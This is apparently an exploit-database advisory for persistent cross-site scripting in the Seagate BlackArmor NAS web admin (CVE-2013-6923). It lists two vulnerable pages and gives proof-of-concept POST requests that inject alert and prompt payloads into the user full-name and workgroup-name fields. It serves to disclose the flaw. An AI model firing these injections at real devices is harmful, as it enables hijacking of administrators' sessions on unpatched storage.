75 lines
No EOL
1.3 KiB
Text
75 lines
No EOL
1.3 KiB
Text
# Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site
|
|
Scripting Vulnerabilities
|
|
|
|
# Google Dork: N/A
|
|
|
|
# Date: 04-01-2014
|
|
|
|
# Exploit Author: Jeroen - IT Nerdbox
|
|
|
|
# Vendor Homepage: <http://www.seagate.com/> http://www.seagate.com/
|
|
|
|
# Software Link:
|
|
<http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
|
|
>
|
|
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
|
|
|
|
# Version: sg2000-2000.1331
|
|
|
|
# Tested on: N/A
|
|
|
|
# CVE : CVE-2013-6923
|
|
|
|
#
|
|
|
|
## Description:
|
|
|
|
#
|
|
|
|
# When adding a user to the device, it is possible to enter a full name.
|
|
This input field does not
|
|
|
|
# sanitize its input and it is possible to enter any payload which will get
|
|
executed upon reload.
|
|
|
|
#
|
|
|
|
# The workgroup configuration is also vulnerable to persistent XSS. The Work
|
|
Group name input
|
|
# field does not sanitize its input.
|
|
|
|
#
|
|
# This vulnerability was reported to Seagate in September 2013, they stated
|
|
that this will not be fixed.
|
|
|
|
#
|
|
|
|
## Proof of Concept #1:
|
|
|
|
#
|
|
|
|
# POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en
|
|
# Parameters:
|
|
|
|
#
|
|
|
|
# index = 2
|
|
# fullname = <script>alert(1);</script>
|
|
# submit = Submit
|
|
|
|
#
|
|
|
|
#
|
|
|
|
## Proof of Concept #2:
|
|
|
|
#
|
|
|
|
# POST: http(s)://<url |
|
|
ip>/admin/network_workgroup_domain.php?lang=en&gi=n003
|
|
|
|
# Parameter:
|
|
|
|
#
|
|
|
|
# workname = "><input onmouseover=prompt(1) > |